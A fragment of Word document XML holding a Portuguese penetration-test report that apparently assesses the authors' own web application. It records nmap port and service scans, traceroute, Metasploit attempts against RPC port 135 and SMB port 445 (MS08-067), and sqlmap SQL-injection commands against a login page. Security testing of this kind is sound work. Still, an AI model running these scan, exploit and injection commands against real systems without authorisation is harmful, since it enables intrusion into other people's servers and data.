          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">softwares que estão rodando </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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D6A2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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>explicar de forma clara, objetiva o resultado obtido (utilize a imagem como ‘ponto’ de explicação).</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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54DEF" w:rsidRDefault="00654DEF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8182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C624E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4 - Portas encontradas e os serviços que estavam rodando nelas no momento do escaneament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  nmap -sV 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que a versão do software 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1609AB" w:rsidRDefault="001609AB" w:rsidP="001609AB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Pr="001609AB" w:rsidRDefault="001609AB" w:rsidP="001609A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4777A" w:rsidRPr="00E01CAE" w:rsidRDefault="0084777A" w:rsidP="0084777A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Pr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e as versões dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">softwares que estão rodando </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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="00626AC7" w:rsidRPr="00626AC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EXPLICAR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624EB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5 - Portas escaneadas e versões dos sistemas que elas estavam rodan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44F31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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944F31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente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8A79EE" w:rsidRPr="00D62225" w:rsidRDefault="008A79EE" w:rsidP="00D622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 nmap -sU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sU” permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w: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C52C4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2C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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</w:t>
      </w:r>
      <w:r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29632F" w:rsidRPr="0029632F" w:rsidRDefault="0029632F" w:rsidP="0029632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4777A" w:rsidRPr="00E01CAE" w:rsidRDefault="0084777A" w:rsidP="0084777A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Pr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e as versões dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">softwares que estão rodando </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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.</w:t>
      </w:r>
      <w:r w:rsidR="00C624EB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667375" cy="379349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6 - Portas UDP escaneadas e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D6222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erviços:</w:t>
      </w:r>
      <w:r w:rsidR="00D62225" w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincronização de relógios usando UDP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-ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - responsável pelo registro de nomes de aplicação do NetBios [4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00174603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 -dgm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - serviço de datagrams do NetBios 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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5] - gerenciamento de redes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microsoft-ds - protocolo windows para compartilhamento e impressões de arquivos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L2TP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de encapsulamento de camada 2, para criar redes vpn privadas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F694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lastRenderedPageBreak/>
        <w:t>nat-t-like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de tradução de ip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A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A” é para usar o </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tracerout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62225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na requisiçã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8A79EE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P_do_servidor informa o IP onde está hospedada a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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29632F" w:rsidRPr="0029632F" w:rsidRDefault="0029632F" w:rsidP="0029632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E01CAE" w:rsidRDefault="0084777A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="008C6DC7" w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se descobrir a rota traçada pelo Traceroute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A79EE" w:rsidRDefault="00C624EB" w:rsidP="00C624E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73951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7 - Rota traçada pelo Tracerouter - Parte 1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37585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8 - Rota traçada pelo Tracerouter - Parte 2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V -p 1-65535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car a versão do software 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devem ser usadas no teste, o delimitador é “-”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.O.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29632F" w:rsidRPr="0029632F" w:rsidRDefault="0029632F" w:rsidP="0029632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4777A" w:rsidRPr="00E01CAE" w:rsidRDefault="0084777A" w:rsidP="0084777A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-se descobrir </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>as portas abertas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, e as versões dos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> softwares</w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A"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  <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">estão rodando </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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676900" cy="38512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9 -  Versão do software rodando nas portas escaneadas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U -p 1-65535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se o detector de portas UDP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FE6FEB" w:rsidRPr="00FE6FEB" w:rsidRDefault="008C6DC7" w:rsidP="00FE6FE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6876BB" w:rsidRDefault="0084777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="008C6DC7" w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se descobrir a v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ersão dos softwares que estão </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rodando nas portas UDP escanead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705475" cy="4083685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0 - Versão do software rodando nas portas UDP escaneadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="008A79EE" w:rsidRDefault="00EC5D2B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8C6DC7" w:rsidRPr="006F6982" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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F6982">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque à porta RPC - via </w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6982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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="2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aque à porta RPC descoberta na análise de servidor via Nmap realizada an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se conectar à porta 135 usando o framework Metasploit para tentar conseguir privilégios dentro do Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="0075159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exploit que ataque a porta 135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iniciantes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Não foi possível obter </w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nenhum resul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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O exploit escolhido para testar o caso específico da porta RPC foi o </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A"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>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> O payload a ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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  <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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1A5B8E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O exploit foi enviado mas não trouxe resultado. Após verificação, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>foi constatado que o exploit é voltado pra Windows NT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tar atacar a porta 445 usando exploits automatizados.</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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esse caso, o exploit escolhido foi o MS08-67 disponível no caminho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">/windows/smb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r w:rsidRPr="000D3326">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>microsoft ds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. O payload é o utilizado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2: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  <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> O exploit não foi executado na máquina do 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Pr="00751591" w:rsidRDefault="0048383A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exploit escolhido foi o </w:t>
      </w:r>
      <w:r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 xml:space="preserve">  para testar o caso específico da porta RPC escolhida. O payload a ser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</w:t>
      </w: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áquina atacante via TCP. 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1A5B8E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  <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> O exploit não foi executado na máquina do servidor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70782B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2.3  Tela de Login – Sqlmap</w:t>
      </w:r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Tarefa realizada no dia 11/04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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lastRenderedPageBreak/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 a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Login fazendo uso </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>injeção SQL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C6DC7" w:rsidRPr="00834FAA" w:rsidRDefault="0048383A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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRDefault="008C6DC7" w:rsidP="00FE6FEB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color w:val="000000"/>
        </w:rPr>
        <w:t>Verificar se a tela de Login é vul</w:t>
      </w:r>
      <w:r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  <w:r w:rsidR="00FE6FEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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FE6FEB" w:rsidRDefault="001A5B8E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tela de Login não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.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Para realizar essa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste foi necessário utilizar a ferramenta</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>momento em que a página do L</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ogin é acessada.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5B8E" w:rsidRPr="00834FAA" w:rsidRDefault="001A5B8E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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00834FAA" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B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405003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E" w:rsidRDefault="008C6DC7" w:rsidP="00870818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lastRenderedPageBreak/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>ros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00654DEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i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i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">"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 xml:space="preserve">--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 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./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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u” utilizado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 xml:space="preserve"> para especificar a URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> alvo da página a ser explorada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ookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque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urrent -db”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>utilizado para obter o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> nome do banco de dados utilizado pela aplicação</w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia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EC5D2B" w:rsidRDefault="008C6DC7" w:rsidP="00F52870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Pr="00D32318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou n</w:t>
      </w:r>
      <w:r w:rsidR="00F52870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o teste. A figura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12</w:t>
      </w:r>
      <w:r w:rsidR="00F528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stram</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a execução e as inúmeras </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s de injeção executadas pela ferramenta automatizada</w:t>
      </w:r>
      <w:r w:rsidR="00F52870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRDefault="00F52870" w:rsidP="00F52870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EC5D2B" w:rsidRPr="001B2F09" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B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76240" cy="407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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00F52870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2</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado aplicação</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection via Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRDefault="00F52870" w:rsidP="00F52870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EFAZER AS CONTAGENS DE IMAGENS DAQUI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09" w:rsidRDefault="0048383A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1B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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etir a ação d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1</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> e aumentar o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">nível de heurística aplicada pelo Sqlmap na injeção de SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para o valor máximo: 5.</w:t>
      </w:r>
      <w:r w:rsidR="00870818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00654DEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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color w:val="000000"/>
        </w:rPr>
        <w:t>" –b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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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urrent -db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 xml:space="preserve">evel 5” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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F52870" w:rsidRPr="001B2F09" w:rsidRDefault="00F52870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F52870" w:rsidRDefault="00F52870" w:rsidP="00F52870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1B2F09" w:rsidRDefault="00F52870" w:rsidP="00F52870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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se que a tela de Login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possível descobrir o nome do banco de dados uti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>lizado pela aplicaçã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Passou no teste. </w:t>
      </w:r>
      <w:r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do aumentado o nível da</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e por consequência não foi possível descobrir o no</w:t>
      </w:r>
      <w:r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945AD3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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00945AD3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945AD3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3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00F52870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atividade: </w:t>
      </w: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Análise do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via</w:t>
      </w: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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ma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 w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objetivo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Após o problema de corrupção do sistema operacional do servidor de dados da aplicação, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de d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lastRenderedPageBreak/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TC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V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é utilizado para realizar o SYN e buscar a versão do software rodando no momento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a serem usadas no teste, o delimitador é “-”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F52870" w:rsidRDefault="00F52870" w:rsidP="00F52870">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1776" w:firstLine="34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6C2DFF" w:rsidP="00F5287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="008C6DC7" w:rsidRPr="009C65C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se descobrir as portas abertas TCP, os s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
